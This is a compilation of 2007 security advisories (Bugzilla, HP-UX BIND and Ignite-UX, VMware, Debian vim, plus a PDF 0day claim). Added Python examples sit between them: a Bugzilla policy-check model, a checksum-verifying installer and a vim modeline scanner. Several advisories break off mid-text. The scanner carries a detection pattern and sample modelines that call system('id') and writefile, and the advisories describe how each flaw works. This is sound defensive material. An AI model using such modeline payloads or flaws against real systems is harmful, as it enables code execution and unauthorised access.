Security Advisory for Bugzilla 3.0.1 and 3.1.1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Summary
=======

Bugzilla is a Web-based bug-tracking system, used by a large number of
software projects. This advisory covers a critical security issue that
has recently been fixed in the Bugzilla code:

* Even with account creation disabled, users can use the WebService to
  create an account.

We strongly advise that 2.23.x and 3.0.x users upgrade to 3.0.2
immediately. Users of CVS HEAD or 3.1.1 should upgrade to 3.1.2
immediately. This is critical if you have a requirelogin installation
(one where every bug is hidden from users who are not logged in, so
self-registering an account is equivalent to bypassing that restriction)
and also have the WebService enabled.

Vulnerability Details
=====================

Class:       Unauthorized Access
Versions:    2.23.3 and above
Description: Bugzilla::WebService::User::offer_account_by_email does not
             check the createemailregexp parameter, and thus allows
             users to create accounts who would normally be denied
             account creation. The emailregexp parameter is still
             checked.

             If you do not have the SOAP::Lite Perl module installed on
             your Bugzilla system, your system is not vulnerable
             (because the Bugzilla WebService will not be enabled).
Reference:   https://bugzilla.mozilla.org/show_bug.cgi?id=395632

Vulnerability Solutions
=======================

The fix for the security bug mentioned in this advisory is included in
the 3.0.2 and 3.1.2 releases. Upgrading to these releases will protect
installations from possible exploits of this issue.

Full release downloads, patches to upgrade Bugzilla from previous
versions, and CVS upgrade instructions are available at:

  http://www.bugzilla.org/download/

If you are unable to upgrade, you should IMMEDIATELY apply the
appropriate patch for your version:

  2.23.x, 3.0.x: https://bugzilla.mozilla.org/attachment.cgi?id=280385
  3.1.x:         https://bugzilla.mozilla.org/attachment.cgi?id=280316

Credits
=======

The Bugzilla team wish to thank the following people for their
assistance in locating, advising us of, and assisting us to fix this
issue:

  Sascha Jensen
  Frédéric Buclin
  Max Kanat-Alexander
  Marc Schumann

General information about the Bugzilla bug-tracking system can be found
at:

  http://www.bugzilla.org/

Comments and follow-ups can be directed to the mozilla.support.bugzilla
newsgroup or the support-bugzilla mailing list.
http://www.bugzilla.org/support/ has directions for accessing these
forums.

- -Max Kanat-Alexander
Release Manager, Bugzilla Project

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFG8aCnaL2D/aEJPK4RAmvIAKDV/8QLPzBh3FIquCISug1SScQIQwCg568R
sDrDqfbLXfcjA/MQ+rTdPLM=
=CH0G
-----END PGP SIGNATURE-----
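The flaw described above is a classic case of one entry point (the WebService) not applying the same policy check as another (the createaccount CGI). The following Python model, added here as an illustration and not code from the Bugzilla project, shows the difference between an account-offer path that validates only address syntax (emailregexp) and one that also enforces the self-registration policy (createemailregexp). The regex values, function names and the `AccountCreationDenied` exception are assumptions for the example; they are not Bugzilla's defaults or API.

```python
import re

# Constructed stand-ins for Bugzilla's emailregexp and createemailregexp
# parameters. The values are assumptions for this example, not Bugzilla's
# defaults: any syntactically valid address passes emailregexp, but only
# example.org addresses are permitted to self-register.
EMAILREGEXP = r"^[\w.+-]+@[\w.-]+\.[A-Za-z]{2,}$"
CREATEEMAILREGEXP = r"^[\w.+-]+@example\.org$"


class AccountCreationDenied(Exception):
    """Raised when the address is well-formed but policy forbids creation."""


def validate_email_syntax(email, emailregexp):
    """The check both code paths always performed: is the address well-formed?"""
    if re.search(emailregexp, email) is None:
        raise ValueError("illegal email address: %r" % email)


def check_creation_policy(email, createemailregexp):
    """The check the WebService path skipped before 3.0.2 / 3.1.2.

    An empty createemailregexp means account creation is disabled for
    everyone; otherwise the address must match the regexp.
    """
    if not createemailregexp or re.search(createemailregexp, email) is None:
        raise AccountCreationDenied("account creation not permitted for %r" % email)


def offer_account_vulnerable(accounts, email,
                             emailregexp=EMAILREGEXP,
                             createemailregexp=CREATEEMAILREGEXP):
    """Models the pre-fix WebService behaviour: syntax check only.

    createemailregexp is accepted but never consulted, which is the bug.
    """
    validate_email_syntax(email, emailregexp)
    accounts.add(email)
    return email


def offer_account_fixed(accounts, email,
                        emailregexp=EMAILREGEXP,
                        createemailregexp=CREATEEMAILREGEXP):
    """Models the fix: every entry point runs the same two checks."""
    validate_email_syntax(email, emailregexp)
    check_creation_policy(email, createemailregexp)
    accounts.add(email)
    return email


def can_self_register(email, **policy):
    """True iff the fixed path would accept the address under the given policy."""
    try:
        offer_account_fixed(set(), email, **policy)
        return True
    except (ValueError, AccountCreationDenied):
        return False


if __name__ == "__main__":
    store = set()
    # The vulnerable path happily creates an account outside the allowed domain.
    print("vulnerable:", offer_account_vulnerable(store, "mallory@attacker.test"))
    # The fixed path refuses the same address, and refuses everyone when the
    # policy regexp is empty (account creation disabled).
    print("fixed, allowed domain:", can_self_register("alice@example.org"))
    print("fixed, other domain:  ", can_self_register("mallory@attacker.test"))
    print("fixed, creation off:  ", can_self_register("alice@example.org",
                                                      createemailregexp=""))
```

The practical lesson is to keep the policy check in one shared routine that every account-creating entry point (CGI, XML-RPC/SOAP, any future API) must call, rather than duplicating it per interface; the advisory's workaround of disabling the WebService (by not installing SOAP::Lite) is the same idea applied from the outside.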
0day: PDF pwns Windows
http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.

The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place.

My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected.

A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon.

cheers

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Mlabs] Scrutinising SIP Payloads : Traversing Attack Vectors in VOIP and IM
Hi

I have released a core research paper on SIP comprising payload problems and attack vectors. This research paper lays stress on the potential weaknesses present in SIP which make it vulnerable to stringent attacks. The point of discussion is to understand the weak spots in the protocol. The payloads constitute the request vectors. The protocol inherits well-defined security procedures and implementation objects. The security model is hierarchical and is diverged in every working layer of SIP from top to bottom. SIP features can be exploited easily if a definitive attack base is subjugated. We will discuss inherited flaws and methods to combat predefined attacks. The payloads have to be scrutinized at the network level. It is critical because payloads are considered as infection bases to infect networks. The pros and cons will be enumerated from a security perspective.

You can download the paper at:

http://mlabs.secniche.org/papers/Scruti_SIP_Payloads.pdf

Regards
Aks aka 0kn0ck
[security bulletin] HPSBUX02251 SSRT071449 rev.2 - HP-UX Running BIND, Remote DNS Cache Poisoning
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01123426
Version: 2

HPSBUX02251 SSRT071449 rev.2 - HP-UX Running BIND, Remote DNS Cache Poisoning

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2007-08-01
Last Updated: 2007-09-10

Potential Security Impact: Remote DNS cache poisoning
Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP-UX running BIND. The vulnerability could be exploited remotely to cause DNS cache poisoning. (CVE-2007-2926 is the BIND 9 weakness in which DNS query IDs are generated predictably, so an off-path attacker can forge answers that the resolver accepts into its cache.)

References: CVE-2007-2926

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.2 or BIND v9.3

BACKGROUND
To determine if a system has an affected version, search the output of

  swlist -a revision -l fileset

for an affected fileset. Then determine if the recommended patch or update is installed.

AFFECTED VERSIONS

For BIND v9.2.0

HP-UX B.11.11
=============
BINDv920.INETSVCS-BIND
action: install BIND920_v10.depot

HP-UX B.11.23
=============
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_36973 or subsequent

For BIND v9.3.2

HP-UX B.11.11
=============
BindUpgrade.BIND-UPGRADE
action: install revision C.9.3.2.2.0 or subsequent
URL: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=BIND

HP-UX B.11.23
=============
BindUpgrade.BIND2-UPGRADE
action: install revision C.9.3.2.2.0 or subsequent
URL: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=BIND

HP-UX B.11.31
=============
NameService.BIND-RUN
action: install named binary file

END AFFECTED VERSIONS

RESOLUTION
HP has provided the following software updates and patches to resolve the vulnerability.

The patch is available from http://itrc.hp.com
The updates are available from http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=BIND

BIND v9.2.0 HP-UX B.11.11: contact HP Support to receive BIND920_v10.depot or upgrade to BIND v9.3.2 revision C.9.3.2.2.0 or subsequent
BIND v9.2.0 HP-UX B.11.23: install PHNE_36973 or subsequent
BIND v9.3.2 HP-UX B.11.11: install revision C.9.3.2.2.0 or subsequent
BIND v9.3.2 HP-UX B.11.23: install revision C.9.3.2.2.0 or subsequent
BIND v9.3.2 HP-UX B.11.31: install named as discussed below

Until a patch or upgrade is released for HP-UX B.11.31, HP has made binary files available to resolve the vulnerability. Please use the following process to download and install the binary file.

1. Download the appropriate named file from this ftp site into a secure directory:

   ftp://ss071449:[EMAIL PROTECTED]/

2. Unpack using gunzip and verify the cksum or md5sum:

   1406468692 4225172 named_9.3.2_11.31IA
   400611368 2269184 named_9.3.2_11.31PA

   MD5 (named_9.3.2_11.31IA) = 9bd93b513fde895ebc32602824db3341
   MD5 (named_9.3.2_11.31PA) = 81041c98b5699d90e0d90cca14f90d18

3. Stop the DNS server:

   If named is normally started and stopped during system reboot, use this command:

     /sbin/init.d/named stop

   If rndc is in use, from the managing server issue this command:

     rndc stop

   If not using rndc, enter this command as root on the system running named:

     sig_named kill

4. Confirm that named is no longer running:

     ps -ef | grep named

   Ignore any lines containing 'grep named'.

5. Replace named with the appropriate downloaded file. Confirm that the downloaded file has permissions/owner/group of '544 bin bin'. Set the ownership and permissions if necessary.

     cp downloaded_file /usr/sbin/named

6. Restart named. If named is normally started during the system reboot:

     /sbin/init.d/named start

   Otherwise, restart named using procedures established for the system.

MANUAL ACTIONS: Yes - NonUpdate
BIND v9.2.0 HP-UX B.11.11 - contact HP Support or upgrade to BIND v9.3.2
BIND v9.3.2 HP-UX B.11.31 - install named file

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

HISTORY
Version: 1 (rev.1) - 1 August 2007 Initial release
Version: 2 (rev.2) - 10 September 2007 patch and updates available

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]

It is strongly recommended that security related
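Step 2 and step 5 of the B.11.31 procedure above are the part an operator is most likely to skip: the binary arrives over plain FTP, so the only thing binding the file you received to the file HP built is the size and digest printed in this (PGP-signed) bulletin. The following Python helper, added here as an example and not part of HP's bulletin, refuses to install a named binary whose byte count (the second field of the cksum line) or MD5 does not match the published values, and applies the required 544 bin bin ownership and mode. It checks MD5 rather than the cksum CRC (use cksum(1) for that), and the `write_sample_file` helper is a constructed stand-in for a download so the code can be exercised without HP's files. MD5 is no longer collision-resistant, but a digest published in a signed bulletin still pins the exact file the vendor produced; the signature on the bulletin should be verified first.

```python
import hashlib
import hmac
import os
import shutil
import stat
import tempfile

# Values copied from the bulletin: byte count (second cksum field) and MD5.
PUBLISHED = {
    "named_9.3.2_11.31IA": (4225172, "9bd93b513fde895ebc32602824db3341"),
    "named_9.3.2_11.31PA": (2269184, "81041c98b5699d90e0d90cca14f90d18"),
}
REQUIRED_MODE = 0o544            # r-xr--r--, the bulletin's "544 bin bin"
REQUIRED_OWNER = ("bin", "bin")  # (user, group)


def md5_hex(path, chunk=1 << 16):
    """Stream the file through MD5 so large binaries need not fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_download(path, expected_md5, expected_size=None):
    """Check an unpacked download against the bulletin; return (ok, reason)."""
    if not os.path.isfile(path):
        return False, "not a regular file: %s" % path
    size = os.path.getsize(path)
    if expected_size is not None and size != expected_size:
        return False, "size mismatch: got %d, bulletin says %d" % (size, expected_size)
    actual = md5_hex(path)
    # compare_digest avoids leaking how many leading characters matched.
    if not hmac.compare_digest(actual, expected_md5.lower()):
        return False, "md5 mismatch: got %s, bulletin says %s" % (actual, expected_md5)
    return True, "ok"


def mode_is_544(st_mode):
    """True if the permission bits of an os.stat() mode are exactly 544."""
    return stat.S_IMODE(st_mode) == REQUIRED_MODE


def install_named(src, dest="/usr/sbin/named", dry_run=True):
    """Steps 2 and 5 of the bulletin: verify, then copy and set 544 bin bin.

    With dry_run=True (the default) nothing is written; the commands that
    would be run are returned instead. Stop named (steps 3 and 4) before
    calling this with dry_run=False.
    """
    name = os.path.basename(src)
    if name not in PUBLISHED:
        raise ValueError("unknown file %s; expected one of %s" % (name, sorted(PUBLISHED)))
    size, digest = PUBLISHED[name]
    ok, why = verify_download(src, digest, size)
    if not ok:
        raise RuntimeError("refusing to install: " + why)
    if dry_run:
        return ["cp %s %s" % (src, dest),
                "chmod 544 %s" % dest,
                "chown bin:bin %s" % dest]
    import grp
    import pwd
    shutil.copy2(src, dest)
    os.chmod(dest, REQUIRED_MODE)
    os.chown(dest,
             pwd.getpwnam(REQUIRED_OWNER[0]).pw_uid,
             grp.getgrnam(REQUIRED_OWNER[1]).gr_gid)
    return ["installed %s" % dest]


def write_sample_file(content=b"hello\n"):
    """Constructed stand-in for a download (not one of HP's binaries)."""
    fd, path = tempfile.mkstemp(prefix="named_sample_")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path


if __name__ == "__main__":
    sample = write_sample_file()
    # The sample is six bytes of constructed content, so it must fail
    # against the published values: that is the refusal we want to see.
    print(verify_download(sample, PUBLISHED["named_9.3.2_11.31IA"][1], 4225172))
    print(verify_download(sample, "b1946ac92492d2347c6235b4d2611184", 6))
```

A real run would be `install_named("/secure/dir/named_9.3.2_11.31IA", dry_run=False)` as root after `/sbin/init.d/named stop`; the function refuses before touching /usr/sbin/named if either check fails.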
VMSA-2007-0006 Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- ------------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2007-0006
Synopsis:          Critical security updates for all supported versions
                   of VMware ESX Server, VMware Server, VMware
                   Workstation, VMware ACE, and VMware Player
Issue date:        2007-09-18
Updated on:        2007-09-18
CVE numbers:       CVE-2007-2446 CVE-2007-2447 CVE-2007-0494
                   CVE-2007-2442 CVE-2007-2443 CVE-2007-2798
                   CVE-2007-0061 CVE-2007-0062 CVE-2007-0063
                   CVE-2007-4059 CVE-2007-4155 CVE-2007-4496
                   CVE-2007-4497 CVE-2007-1856 CVE-2006-1174
                   CVE-2006-4600 CVE-2004-0813 CVE-2007-1716
                   CVE-2006-3619 CVE-2006-4146
- ------------------------------------------------------------------------

1. Summary:

Updated versions of all supported hosted products and all ESX 2.x
products, and patches for ESX 3.0.x, address critical security updates.
Service Console security updates for samba, bind, krb5, vixie-cron,
shadow-utils, openldap, pam, gcc, and gdb packages.

2. Relevant releases:

VMware Workstation 6.0.0
VMware Player 2.0.0
VMware ACE 2.0.0
VMware Workstation prior to 5.5.5
VMware Player prior to 1.0.5
VMware Server prior to 1.0.4
VMware ACE prior to 1.0.4

VMware ESX 3.0.2 without patches ESX-1001725 ESX-1001731 ESX-1001726
  ESX-1001727 ESX-1001728 ESX-1001729 ESX-1001730
VMware ESX 3.0.1 without patches ESX-8258730 ESX-1001213 ESX-1001691
  ESX-1001723 ESX-1001214 ESX-1001692 ESX-1001693 ESX-1001694
  ESX-8253547 ESX-8567382
VMware ESX 3.0.0 without patches ESX-4809553 ESX-1001204 ESX-1001206
  ESX-1001212 ESX-1001205 ESX-1001207 ESX-1001208 ESX-1001209
  ESX-1001210 ESX-1001211

VMware ESX 2.5.4 prior to upgrade patch 10 (Build# 53326)
VMware ESX 2.5.3 prior to upgrade patch 13 (Build# 52488)
VMware ESX 2.1.3 prior to upgrade patch 8 (Build# 53228)
VMware ESX 2.0.2 prior to upgrade patch 8 (Build# 52650)

3. Problem description:

Problems addressed by these patches:

I   Arbitrary code execution and denial of service vulnerabilities

This release fixes a security vulnerability that could allow a guest
operating system user with administrative privileges to cause memory
corruption in a host process, and thus potentially execute arbitrary
code on the host. (CVE-2007-4496)

This release fixes a denial of service vulnerability that could allow a
guest operating system to cause a host process to become unresponsive
or exit unexpectedly. (CVE-2007-4497)

Thanks to Rafal Wojtczuk of McAfee for identifying and reporting these
issues.

ESX
---
VMware ESX 3.0.1
  Download Patch Bundle ESX-8258730
  http://www.vmware.com/support/vi3/doc/esx-8258730-patch.html
  md5sum a06d0e36e403b0fe6bc6fbc76220a86d

VMware ESX 3.0.0
  Download Patch Bundle ESX-4809553
  http://www.vmware.com/support/vi3/doc/esx-4809553-patch.html
  md5sum cd363526aab5fa6c45bf2509cb5ae500

NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007). Users should
upgrade to at least 3.0.1 and preferably the newest release available.

VMware ESX 2.5.4 upgrade to patch 10 (Build# 53326)
VMware ESX 2.5.3 upgrade to patch 13 (Build# 52488)
VMware ESX 2.1.3 upgrade to patch 8 (Build# 53228)
VMware ESX 2.0.2 upgrade to patch 8 (Build# 52650)

NOTE: ESX 3.0.2 is not affected by this issue

Hosted products
---------------
VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017)
VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455)
VMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017)
VMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455)
VMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528)
VMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017)
VMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075)

II  Hosted products DHCP security vulnerabilities addressed

This release fixes several vulnerabilities in the DHCP server that could
enable specially crafted packets to gain system-level privileges.
(CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)

Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security Systems
X-Force for discovering and researching these vulnerabilities.

Hosted products
---------------
VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017)
VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455)
VMware Player 2.0.0
[SECURITY] [DSA 1364-2] New vim packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1364-2                   [EMAIL PROTECTED]
http://www.debian.org/security/                              dann frazier
September 19th, 2007                    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : vim
Vulnerability  : several
Problem-Type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2007-2438 CVE-2007-2953

Several vulnerabilities have been discovered in the vim editor. The
Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2007-2953

    Ulf Harnhammar discovered that a format string flaw in helptags_one()
    from src/ex_cmds.c (triggered through the helptags command) can lead
    to the execution of arbitrary code.

CVE-2007-2438

    Editors often provide a way to embed editor configuration commands
    (aka modelines) which are executed once a file is opened. Harmful
    commands are filtered by a sandbox mechanism. It was discovered that
    function calls to writefile(), feedkeys() and system() were not
    filtered, allowing shell command execution with a carefully crafted
    file opened in vim.

This updated advisory repairs issues with missing files in the packages
for the oldstable distribution (sarge) for the alpha, mips, and mipsel
architectures.

For the oldstable distribution (sarge) these problems have been fixed in
version 6.3-071+1sarge2. Sarge is not affected by CVE-2007-2438.

For the stable distribution (etch) these problems have been fixed in
version 7.0-122+1etch3.

For the unstable distribution (sid) these problems have been fixed in
version 7.1-056+1.

We recommend that you upgrade your vim packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2.dsc
      Size/MD5 checksum:     1376 a447ab6dba1d93c924841af4234e0f5b
    http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2.diff.gz
      Size/MD5 checksum:   262331 96005f014eb64ad9e9056daf0f578582
    http://security.debian.org/pool/updates/main/v/vim/vim_6.3.orig.tar.gz
      Size/MD5 checksum:  5624622 de1c964ceedbc13538da87d2d73fd117

  Architecture independent components:

    http://security.debian.org/pool/updates/main/v/vim/vim-common_6.3-071+1sarge2_all.deb
      Size/MD5 checksum:  3424544 bd11013f7a21dfa3b6ba0c819eec5cc6
    http://security.debian.org/pool/updates/main/v/vim/vim-doc_6.3-071+1sarge2_all.deb
      Size/MD5 checksum:  1649542 d7d8c03c0c8247a253dbb261fa40d983

  Alpha architecture:

    http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   897132 9b1b19c22a65bd4046684a603ea60146
    http://security.debian.org/pool/updates/main/v/vim/vim-full_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   987420 0f50e5570e94d0d24544770ffe0cf4f6
    http://security.debian.org/pool/updates/main/v/vim/vim-gnome_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   945902 9a583b7323e9907362cd4a5b5dd9054d
    http://security.debian.org/pool/updates/main/v/vim/vim-gtk_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   942798 70d57f86db028310f41981c4a7b108a1
    http://security.debian.org/pool/updates/main/v/vim/vim-lesstif_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   882500 d7a02c364f09a4ae502b3cc9180b83b4
    http://security.debian.org/pool/updates/main/v/vim/vim-perl_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   959276 4895da0a62b9adf22868d7917bb5974e
    http://security.debian.org/pool/updates/main/v/vim/vim-python_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   954374 5e43d44823c54f75d58dd920b84675c5
    http://security.debian.org/pool/updates/main/v/vim/vim-ruby_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   949052 2df101622632733db64ffb1a1be758e3
    http://security.debian.org/pool/updates/main/v/vim/vim-tcl_6.3-071+1sarge2+b1_alpha.deb
      Size/MD5 checksum:   953728 f36fba9f17e9364f87fe3fc9baab286a

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2_amd64.deb
      Size/MD5 checksum:   770114 6f1818ee5504c2b0a5e52ee8d41b1806
    http://security.debian.org/pool/updates/main/v/vim/vim-full_6.3-071+1sarge2_amd64.deb
      Size/MD5 checksum:   835450
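For the CVE-2007-2438 modeline issue described in the advisory above, the useful check before upgrading (or before opening files from untrusted sources on a machine that cannot be upgraded yet) is whether a file carries a modeline whose option value calls one of the three functions the sandbox failed to filter. The scanner below is an added example, not Debian's or vim's code; it implements a simplified version of vim's two modeline forms (`vim: opt:opt` and `vim: set opt opt:`), honours vim's default of only reading modelines in the first and last five lines (`modelines=5`), and flags options containing writefile(, feedkeys( or system(. The `SAMPLE` text is constructed for the example.

```python
import re
from typing import List, Optional, Tuple

# The vim function calls the advisory names as unfiltered by the modeline sandbox.
DANGEROUS_CALL = re.compile(r"\b(?:writefile|feedkeys|system)\s*\(", re.IGNORECASE)

# Simplified modeline recogniser (an approximation of vim's own parser):
# "vi:", "vim:", "Vim:" or "ex:", optionally with a version such as
# "vim700:" or "vim>=700:", preceded by start of line or whitespace.
MODELINE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex)(?:[<=>]?\d+)?:\s*(?P<body>.*)$")


def modeline_options(line: str) -> Optional[List[str]]:
    """Return the option words of a modeline, or None if the line has none."""
    m = MODELINE.search(line)
    if m is None:
        return None
    body = m.group("body")
    setform = re.match(r"(?:se|set|setl|setlocal)\s+(?P<opts>.*)", body)
    if setform:
        # Second form: "vim: set opt opt: trailing text". Options end at the
        # first unescaped ':' and spaces inside a value must be backslashed.
        opts = re.split(r"(?<!\\):", setform.group("opts"), maxsplit=1)[0]
        return [o for o in re.split(r"(?<!\\)\s+", opts) if o]
    # First form: "vim: opt:opt opt", options separated by ':' or blanks.
    return [o for o in re.split(r"(?<!\\)[\s:]+", body) if o]


def scan_for_dangerous_modelines(text: str,
                                 modelines: Optional[int] = 5) -> List[Tuple[int, str]]:
    """Return (1-based line number, option) for every dangerous modeline option.

    modelines=5 mirrors vim's default window (first and last 5 lines);
    pass None to scan the whole file regardless of where vim would look.
    """
    lines = text.splitlines()
    if modelines is None:
        candidates = range(len(lines))
    else:
        head = range(min(modelines, len(lines)))
        tail = range(max(len(lines) - modelines, 0), len(lines))
        candidates = sorted(set(head) | set(tail))
    hits: List[Tuple[int, str]] = []
    for i in candidates:
        opts = modeline_options(lines[i])
        if not opts:
            continue
        for opt in opts:
            if DANGEROUS_CALL.search(opt):
                hits.append((i + 1, opt))
    return hits


# Constructed sample file (12 lines). Line 5 is inside vim's default window,
# line 6 is not, so vim would act on line 5 only; both are still worth flagging.
SAMPLE = "\n".join([
    "/* vim: set ts=4 sw=4 et: */",                      # 1: benign, set form
    "int main(void) { return 0; }",                       # 2
    "",                                                   # 3
    "/* vim: ts=4:sw=4 */",                               # 4: benign, first form
    "/* vim: set fdm=expr fdl=0 fde=system('id'): */",    # 5: dangerous
    "/* vim: set fde=writefile(['x'],'/tmp/x'): */",      # 6: dangerous, outside window
    "more body text",                                     # 7
    "more body text",                                     # 8
    "more body text",                                     # 9
    "more body text",                                     # 10
    "more body text",                                     # 11
    "/* vim: set noet: */",                               # 12: benign
])


if __name__ == "__main__":
    print("vim's default window:", scan_for_dangerous_modelines(SAMPLE))
    print("whole file:          ", scan_for_dangerous_modelines(SAMPLE, modelines=None))
```

On a host that cannot take the fixed package immediately, `set nomodeline` in the system vimrc removes the attack surface entirely; the scanner is for triaging files that have already arrived.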
[security bulletin] HPSBUX02249 SSRT071442 rev.2 - HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01118367
Version: 2

HPSBUX02249 SSRT071442 rev.2 - HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2007-08-20
Last Updated: 2007-09-12

Potential Security Impact: Local unqualified configuration change
Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX running the Ignite-UX or the DynRootDisk (DRD) get_system_info command. This command can change system networking parameters without notification.

References: none

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running the Ignite-UX vC.7.0, vC.7.1, vC.7.2, vC.7.3 or the DynRootDisk (DRD) vA.1.0.16.417, vA.1.0.18.245, vA.1.1.0.344, vA.2.0.0.592 get_system_info command.

BACKGROUND
The get_system_info command is executed by the following commands:

  make_net_recovery
  make_tape_recovery
  save_config
  drd

To determine if an HP-UX system has an affected version, search the output of

  swlist -a revision -l fileset

for one of the filesets listed below. For affected systems verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
=============
Ignite-UX.MGMT-TOOLS,revision=C.7.0.212
Ignite-UX.MGMT-TOOLS,revision=C.7.1.93
Ignite-UX.MGMT-TOOLS,revision=C.7.2.94
Ignite-UX.MGMT-TOOLS,revision=C.7.3.144
action: use the script from the Resolution to work around the vulnerability

HP-UX B.11.23
HP-UX B.11.31
=============
DRD.DRD-RUN,revision=A.1.0.16.417
DRD.DRD-RUN,revision=A.1.0.18.245
DRD.DRD-RUN,revision=A.1.1.0.344
DRD.DRD-RUN,revision=A.2.0.0.592
action: use the script from the Resolution to work around the vulnerability

END AFFECTED VERSIONS

RESOLUTION
Until an update is available, HP has made the following workaround procedure available to resolve the issue.

Note: The script has changed. The script recommended in rev.1 of this Security Bulletin did not correctly check the HP Ignite-UX revision number. The original script would only install itself on HP Ignite-UX revision C.7.3.144. The new script documented below will work properly on all vulnerable revisions of HP Ignite-UX. Either the old or new script will work correctly with DynRootDisk.

The procedure below moves the get_system_info program to another directory and replaces it with a script. The script temporarily disables the autopush program, runs the original get_system_info, and then enables autopush. By running the original get_system_info program with autopush disabled the vulnerability is avoided. More details are documented in the script.

1. Download the script get_system_info.wrapper from the following ftp site:

     ftp://ss071442:[EMAIL PROTECTED]/

2. Verify the cksum or md5 sum:

     cksum: 2284708550 5344 get_system_info.wrapper
     MD5 (get_system_info.wrapper) = 6ed1dfc6508e2cb45f8624a8ed31611f

   The new script contains this line:

     # @(#) $Date: 2007-09-11 10:30:49 -0600 (Tue, 11 Sep 2007) $ $Revision: 71524 $

3. As root, copy the script into a secure directory.

4. As root, run the script. The script will display the files it is replacing. For example:

     # $secure_directory/get_system_info.wrapper
     Replacing /opt/ignite/lbin/get_system_info with $secure_directory/get_system_info.wrapper
